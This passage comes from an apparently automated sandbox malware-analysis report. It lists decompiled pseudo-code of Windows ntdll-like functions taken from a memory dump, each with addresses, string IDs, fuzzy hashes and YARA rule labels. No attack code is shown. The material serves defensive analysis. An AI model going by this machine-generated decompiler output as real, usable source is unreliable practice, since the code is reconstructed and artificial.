						E0126DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E012A0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E012597C0();
					}
					return E0125B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01293971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01293884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0125FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01259650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01293787(_a4,  &_v352, _t80);
						}
					}
					L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E012595D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                    0x01293552
                                                    0x0129355a
                                                    0x0129355d
                                                    0x01293566
                                                    0x01293567
                                                    0x0129357e
                                                    0x0129358f
                                                    0x012935a1
                                                    0x012935a5
                                                    0x0129366b
                                                    0x0129366b
                                                    0x0129366d
                                                    0x01293672
                                                    0x01293679
                                                    0x01293685
                                                    0x0129368d
                                                    0x0129369d
                                                    0x012936a7
                                                    0x012936b8
                                                    0x012936c6
                                                    0x012936c7
                                                    0x012936dc
                                                    0x012936e1
                                                    0x012936e7
                                                    0x012936e9
                                                    0x012936e9
                                                    0x01293703
                                                    0x01293703
                                                    0x012935b5
                                                    0x012935c0
                                                    0x012935c4
                                                    0x00000000
                                                    0x00000000
                                                    0x012935ca
                                                    0x012935d7
                                                    0x012935e2
                                                    0x012935e6
                                                    0x012935e8
                                                    0x012935f5
                                                    0x012935fa
                                                    0x01293603
                                                    0x01293604
                                                    0x01293609
                                                    0x0129360a
                                                    0x01293612
                                                    0x01293613
                                                    0x0129361e
                                                    0x01293622
                                                    0x01293628
                                                    0x0129362f
                                                    0x0129362f
                                                    0x01293636
                                                    0x01293638
                                                    0x0129363b
                                                    0x01293642
                                                    0x01293642
                                                    0x01293636
                                                    0x01293657
                                                    0x01293657
                                                    0x0129365c
                                                    0x01293662
                                                    0x01293669
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    • Opcode ID: 97afe20b721ef2952e44c6d56e98b0955eb5ad0992c66b524f01b1cfcf81ff66
                                                    • Instruction ID: a51af8e546d609fa0b11287e8b789ce0d8ded4d6d7611dcd13ca01aa929b39b2
                                                    • Opcode Fuzzy Hash: 97afe20b721ef2952e44c6d56e98b0955eb5ad0992c66b524f01b1cfcf81ff66
                                                    • Instruction Fuzzy Hash: 2A4113B2D1052D9FDF21DA64CC84FAEB77CAB54714F0045A5EB09A7240DB309E888F99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012E05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E012E05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E012E07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01259730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E012DA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E012DA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E012E1293(_t79, _v40, E012E07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01237D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E012D138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                    0x012e05c5
                                                    0x012e05ca
                                                    0x012e05d3
                                                    0x012e06db
                                                    0x012e06db
                                                    0x012e06dd
                                                    0x012e06e3
                                                    0x012e06e3
                                                    0x012e05dd
                                                    0x012e05e7
                                                    0x012e05f6
                                                    0x012e0600
                                                    0x012e0607
                                                    0x012e0610
                                                    0x012e0615
                                                    0x012e061a
                                                    0x012e061c
                                                    0x012e061e
                                                    0x012e0624
                                                    0x012e0625
                                                    0x012e0627
                                                    0x012e0628
                                                    0x012e0631
                                                    0x012e0640
                                                    0x012e064d
                                                    0x012e0654
                                                    0x012e0654
                                                    0x012e0631
                                                    0x012e066d
                                                    0x012e0674
                                                    0x00000000
                                                    0x00000000
                                                    0x012e0692
                                                    0x012e069e
                                                    0x012e06b0
                                                    0x012e06a0
                                                    0x012e06a9
                                                    0x012e06a9
                                                    0x012e06b8
                                                    0x012e06d6
                                                    0x012e06d6
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction ID: 3fcd8d24f477ad7bcc995bc0586ff9905e0dcb2e89d4795eae8ca4cfdb5b6ebe
                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction Fuzzy Hash: 7731F3723103466FE720DE29CC89F9B7BD9ABC4754F144229FA54DB280D7B0E905CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01293884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E01293884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01259650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01234620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01259650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                    0x01293893
                                                    0x01293896
                                                    0x01293899
                                                    0x0129389f
                                                    0x012938a0
                                                    0x012938a4
                                                    0x012938a9
                                                    0x012938ac
                                                    0x012938ad
                                                    0x012938ae
                                                    0x012938af
                                                    0x012938b1
                                                    0x012938b4
                                                    0x012938bb
                                                    0x012938bc
                                                    0x012938bd
                                                    0x012938c4
                                                    0x012938c8
                                                    0x012938ca
                                                    0x012938ca
                                                    0x012938d5
                                                    0x0129393e
                                                    0x01293940
                                                    0x01293942
                                                    0x01293952
                                                    0x01293954
                                                    0x01293961
                                                    0x01293961
                                                    0x01293967
                                                    0x0129396e
                                                    0x0129396e
                                                    0x01293947
                                                    0x0129394c
                                                    0x00000000
                                                    0x0129394c
                                                    0x012938ea
                                                    0x012938ee
                                                    0x012938f8
                                                    0x012938f9
                                                    0x012938ff
                                                    0x01293900
                                                    0x01293902
                                                    0x01293903
                                                    0x0129390b
                                                    0x0129390f
                                                    0x01293950
                                                    0x00000000
                                                    0x01293950
                                                    0x01293915
                                                    0x0129391d
                                                    0x0129391d
                                                    0x01293922
                                                    0x01293926
                                                    0x00000000
                                                    0x01293928
                                                    0x0129392b
                                                    0x0129392b
                                                    0x01293935
                                                    0x01293937
                                                    0x01293937
                                                    0x00000000
                                                    0x01293935
                                                    0x01293926
                                                    0x012938f0
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryName
                                                    • API String ID: 0-215506332
                                                    • Opcode ID: 63da620754e60e8d43cbdfacc485f8433b5bcada1a915f14f85996dc8a091606
                                                    • Instruction ID: b63b4495d88de88e5fa14efac55384da7b9124b78e69d1ec3a808b6f4c0d32b0
                                                    • Opcode Fuzzy Hash: 63da620754e60e8d43cbdfacc485f8433b5bcada1a915f14f85996dc8a091606
                                                    • Instruction Fuzzy Hash: B331C37291151AAFEF15DB6CC945E7BBB74FB80B20F114169EE15A7250D7309E04C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0124D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 33%
                                                    			E0124D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x130d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01234120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0125B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E012598D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E012595D0();
					L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                    0x0124d29c
                                                    0x0124d2a6
                                                    0x0124d2b1
                                                    0x0124d2b5
                                                    0x0124d2b6
                                                    0x0124d2bc
                                                    0x0124d2bd
                                                    0x0124d2be
                                                    0x0124d2bf
                                                    0x0124d2c2
                                                    0x0124d2c4
                                                    0x0124d2cc
                                                    0x0124d384
                                                    0x0124d34b
                                                    0x0124d34f
                                                    0x0124d350
                                                    0x0124d351
                                                    0x0124d35c
                                                    0x0124d35c
                                                    0x0124d2d6
                                                    0x0124d2da
                                                    0x0124d2e1
                                                    0x0124d361
                                                    0x0124d369
                                                    0x0124d36d
                                                    0x0124d2e3
                                                    0x0124d2e3
                                                    0x0124d2e3
                                                    0x0124d2e5
                                                    0x0124d2ed
                                                    0x0124d2f5
                                                    0x0124d2fa
                                                    0x0124d302
                                                    0x0124d303
                                                    0x0124d30b
                                                    0x0124d30f
                                                    0x0124d313
                                                    0x0124d318
                                                    0x0124d31c
                                                    0x0124d320
                                                    0x0124d379
                                                    0x0124d37d
                                                    0x00000000
                                                    0x00000000
                                                    0x0128affe
                                                    0x0128b001
                                                    0x0128b011
                                                    0x00000000
                                                    0x0124d322
                                                    0x0124d322
                                                    0x0124d330
                                                    0x0124d337
                                                    0x0124d35d
                                                    0x0124d339
                                                    0x0124d33f
                                                    0x0124d38c
                                                    0x0124d38c
                                                    0x0124d33f
                                                    0x0124d349
                                                    0x00000000
                                                    0x0124d349

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 23c66b4ef8b562a65812f6677beaca2137aca49d4656867f3b4dd39b58fb3c4f
                                                    • Instruction ID: a0b936ff303b4aa156d6303405b13e3c7676e0082a9b74fc101eca8b26e192a4
                                                    • Opcode Fuzzy Hash: 23c66b4ef8b562a65812f6677beaca2137aca49d4656867f3b4dd39b58fb3c4f
                                                    • Instruction Fuzzy Hash: 0D31C0B156830ADFC725DF68C881A6BBFE8EBE5654F00092EF99483250D634DD04CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01221B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E01221B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0125BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0125A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0125A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01234620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                    0x01221b8f
                                                    0x01221b9a
                                                    0x01221b9c
                                                    0x01221b9e
                                                    0x01221ba3
                                                    0x01277010
                                                    0x01277010
                                                    0x00000000
                                                    0x01221ba9
                                                    0x01221ba9
                                                    0x01221bae
                                                    0x00000000
                                                    0x01221bc5
                                                    0x01221bca
                                                    0x01221bcf
                                                    0x01221bd0
                                                    0x01221bd1
                                                    0x01221bd2
                                                    0x01221bd6
                                                    0x01221bdc
                                                    0x01221be0
                                                    0x01276ffc
                                                    0x01277000
                                                    0x00000000
                                                    0x01277006
                                                    0x01277009
                                                    0x01277009
                                                    0x01221be6
                                                    0x01221bec
                                                    0x01221c0b
                                                    0x01221c0b
                                                    0x01221c0c
                                                    0x01221c11
                                                    0x01221c12
                                                    0x01221c15
                                                    0x01221c1b
                                                    0x01221c1f
                                                    0x01221c31
                                                    0x01221c33
                                                    0x01277026
                                                    0x01277026
                                                    0x01221c21
                                                    0x01221c24
                                                    0x01221c24
                                                    0x01221bee
                                                    0x01221bee
                                                    0x01221bf2
                                                    0x01221c3a
                                                    0x01221bf4
                                                    0x01221bf4
                                                    0x01221c05
                                                    0x01221c05
                                                    0x01221c09
                                                    0x01221c3e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01221c09
                                                    0x01221bec
                                                    0x01221be0
                                                    0x01221bae
                                                    0x01221c2e

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: WindowsExcludedProcs
                                                    • API String ID: 0-3583428290
                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction ID: 77c46161897b7391becc25fbb7e669ee7770cc9066942aead66a865591da6865
                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction Fuzzy Hash: BE21F57A52123ABBDB229A598884F6FBBADAF81A50F154425FE048B200D670DC1097E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0123F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0123F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                    0x0123f71d
                                                    0x0123f722
                                                    0x0123f726
                                                    0x01284770
                                                    0x0123f765
                                                    0x0123f769
                                                    0x0123f769
                                                    0x0123f732
                                                    0x0128477a
                                                    0x00000000
                                                    0x0128477a
                                                    0x0123f738
                                                    0x0123f73a
                                                    0x0123f73c
                                                    0x0123f73f
                                                    0x0123f746
                                                    0x0123f778
                                                    0x0123f7a9
                                                    0x0123f7a9
                                                    0x0123f754
                                                    0x0123f75a
                                                    0x0123f75d
                                                    0x0123f75f
                                                    0x0123f761
                                                    0x0123f76f
                                                    0x0123f771
                                                    0x0123f771
                                                    0x0123f76f
                                                    0x0123f763
                                                    0x00000000
                                                    0x0123f763
                                                    0x0123f77d
                                                    0x0123f7a3
                                                    0x0123f7a5
                                                    0x00000000
                                                    0x0123f7a5
                                                    0x0123f77f
                                                    0x0123f782
                                                    0x0123f784
                                                    0x0123f786
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0123f788
                                                    0x0123f748
                                                    0x0123f74d
                                                    0x0123f78d
                                                    0x0123f793
                                                    0x0123f7b7
                                                    0x0123f7bc
                                                    0x00000000
                                                    0x0123f7bc
                                                    0x0123f798
                                                    0x00000000
                                                    0x00000000
                                                    0x0123f79d
                                                    0x0123f7b0
                                                    0x00000000
                                                    0x0123f7b0
                                                    0x0123f79f
                                                    0x00000000
                                                    0x0123f74f
                                                    0x0123f74f
                                                    0x00000000
                                                    0x0123f74f

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Actx
                                                    • API String ID: 0-89312691
                                                    • Opcode ID: 67c669b70aa711d84019a431a67f04b90c0d6c744fa67f76d21582e50bc3b89a
                                                    • Instruction ID: f1b6f519d4268bca731992dc37fd567d774716b2a3c8886d9f33ee2220ba2c97
                                                    • Opcode Fuzzy Hash: 67c669b70aa711d84019a431a67f04b90c0d6c744fa67f76d21582e50bc3b89a
                                                    • Instruction Fuzzy Hash: 0711B1B4B347038BEB2F4E1DAB91B367695ABC5224F24453AE665CB391D6B0C8018342
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012C8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E012C8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x12f0d50);
				E0126D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E012A5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0126DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0126DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0126D130(_t34, _t39, _t40);
			}





                                                    0x012c8df1
                                                    0x012c8df1
                                                    0x012c8df1
                                                    0x012c8df1
                                                    0x012c8df1
                                                    0x012c8df1
                                                    0x012c8df3
                                                    0x012c8df8
                                                    0x012c8dfd
                                                    0x012c8e00
                                                    0x012c8e0e
                                                    0x012c8e2a
                                                    0x012c8e36
                                                    0x012c8e38
                                                    0x012c8e3c
                                                    0x012c8e46
                                                    0x012c8e46
                                                    0x012c8e36
                                                    0x012c8e50
                                                    0x012c8e56
                                                    0x012c8e59
                                                    0x012c8e5c
                                                    0x012c8e60
                                                    0x012c8e67
                                                    0x012c8e6d
                                                    0x012c8e73
                                                    0x012c8e74
                                                    0x012c8eb1
                                                    0x012c8ebd

                                                    Strings
                                                    • Critical error detected %lx, xrefs: 012C8E21
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Critical error detected %lx
                                                    • API String ID: 0-802127002
                                                    • Opcode ID: ba3f3b944e228900cba6639d6c7a23f6cee65e0ab92ba74d3b6756815d8d6901
                                                    • Instruction ID: 7ee7093690c95e01f80dda499c44d6475b6227314635aeb9954708cb7b2f2d7d
                                                    • Opcode Fuzzy Hash: ba3f3b944e228900cba6639d6c7a23f6cee65e0ab92ba74d3b6756815d8d6901
                                                    • Instruction Fuzzy Hash: 29117971D2034DDBDF25CFE989057ACBBB4AB04710F20825DE2686B2C2C3740601CF14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012AFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 012AFF60
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                    • API String ID: 0-1911121157
                                                    • Opcode ID: db8119c92548778a3f65ae3ec16f3a1d354f76cc86c7a8c3229156d2678fafb9
                                                    • Instruction ID: b150afb00da84cb7ea8350ba1aa334015d1aaf0e36f808859a23504db9b538ab
                                                    • Opcode Fuzzy Hash: db8119c92548778a3f65ae3ec16f3a1d354f76cc86c7a8c3229156d2678fafb9
                                                    • Instruction Fuzzy Hash: 9611E171630149EFDF26DB54CA48FACBBB5BB08704F558054E204A71E1C77C9980CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012E5BA5, Relevance: .6, Instructions: 592COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E012E5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x12f1178);
				E0126D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
